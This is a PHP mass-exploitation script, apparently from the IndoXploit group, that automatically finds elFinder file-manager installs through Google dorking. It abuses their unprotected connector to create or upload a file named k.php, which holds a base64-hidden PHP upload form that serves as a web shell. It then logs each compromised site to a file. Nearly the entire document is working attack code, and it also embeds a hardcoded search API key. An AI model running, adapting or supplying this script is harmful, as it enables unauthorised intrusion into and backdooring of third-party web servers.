Auto exploiter Elfinder and Dorking

1. <?php
2. # Tu5b0l3d - IndoXploit
3. # thx: shor7cut, sohai
4. # http://indoxploit.blogspot.co.id/2016/03/auto-dorking-exploit-elfinder.html
5.  
6. error_reporting(0);
7. //mulai
8. $dorks = "/elFinder/files"; // ini dork, bisa diganti
9. $no=1;
10. $b = 8;
11. $total_target =0;
12. $dork = urlencode($dorks);
13. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
14. $nama_doang = "k.php"; //ini cuma nama
15.  
16. $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
17.  
18. $decode_isi = base64_decode($isi_nama_doang);
19. $encode = base64_encode($nama_doang);
20.  
21. $fp = fopen($nama_doang,"w");
22. fputs($fp, $decode_isi);
23. //end
24.  
25.  
26. function save($data){
27.         $fp = @fopen("shell_elFinder.htm", "a") or die("cant open file");
28.         fwrite($fp, $data);
29.         fclose($fp);
30. }
31.  
32. function ngirim($url, $isi){
33. $ch = curl_init ("$url");
34. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
35. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
36. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
37. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
38. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
39. curl_setopt ($ch, CURLOPT_POST, 1);
40. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
41. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
42. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
43. $data3 = curl_exec ($ch);
44. return $data3;
45. }
46.  
47. function elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site){
48. $url_mkfile = "$target?cmd=mkfile&name=$nama_doang&target=l1_Lw";
49. $b = file_get_contents("$url_mkfile");
50.  
51.  $post1 = array(
52.                     "cmd" => "put",
53.                     "target" => "l1_$encode",
54.                     "content" => "$decode_isi",
55.                    
56.                     );
57.  $post2 = array(
58.                    
59.                     "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
60.                     "upload[]" => "@$nama_doang",
61.                    
62.                     );
63.  
64. $output_mkfile = ngirim("$target", $post1);
65. if(preg_match("/$nama_doang/", $output_mkfile)){
66.     $b = cek_pepes($ini_site, $nama_doang);
67.     return $b;
68. }
69. else{
70. $upload_ah = ngirim("$target?cmd=upload", $post2);
71. if(preg_match("/$nama_doang/", $upload_ah)){
72.     $b = cek_pepes($ini_site, $nama_doang);
73.     return $b;
74. }
75. else{
76.     $b = "# Upload Failed 2\n";
77.     return $b;
78. }
79. }
80. }
81.  
82. function cek_pepes($target, $nama_doang){
83.     $aso = "$target/files/$nama_doang";
84.     echo "# $aso\n";
85.     $cekk = file_get_contents("$aso");
86.     if(preg_match("/file/", $cekk)){
87.         $a = "# Uploaded \n# $aso";
88.         save("$aso<br>");
89.         return $a;
90.     }
91.     else{
92.         $a = "# Gagal Upload";
93.         return $a;
94.     }
95. }
96.  
97.     for($i=0;$i+=8;$i++){
98.         echo $i."\n";
99. $result = file_get_contents("http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q=$dork&key=$kunAPI&start=$i");
100. $data = json_decode($result, true);
101.  
102. if($data['responseStatus']=="200"){
103. foreach ($data['responseData']['results'] as $key) {
104.  
105. $siten = $key['url'];
106. $explode = explode("files", $siten);
107.     $ini_site = $explode[0];
108.     $ini = array("connectors/php/connector.php", "php/connector.php");
109.     foreach($ini as $path){
110.         $target = "$ini_site$path";
111.         echo "# $target\n";
112.         $cek = file_get_contents("$target");
113.         $data = json_decode($cek, true);
114.         $error_ngk = $data['error']['0'];
115.         $error_cwd = $data['cwd']['name'];
116.  
117.         if($error_ngk == ""){
118.             if($error_cwd == "Home"){
119.                 $b = elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site);
120.                 echo "$b\n\n";
121.             }
122.             else{
123.                 echo "- Not Vuln!\n\n";
124.             }
125.         }
126.         else{
127.             $b = elfinder($target, $nama_doang, $url_mkfile, $encode, $decode_isi, $nama_doang, $ini_site);
128.             echo "$b\n\n";
129.         }
130.             }
131.  
132.  
133.  
134.     $total_target++;
135.      flush();
136.      sleep(1);
137.    
138. }
139. }
140. else if($data['responseStatus']=="403"){
141. echo "Suspected Terms of Service Abuse!!! {oww jancokk -_-}\n";
142. }else if($data['responseStatus']=="400"){
143. echo "Tidak ada hasil - Scan Done !!!\n";
144. break;
145. }
146. $no++;
147. }
148. ?>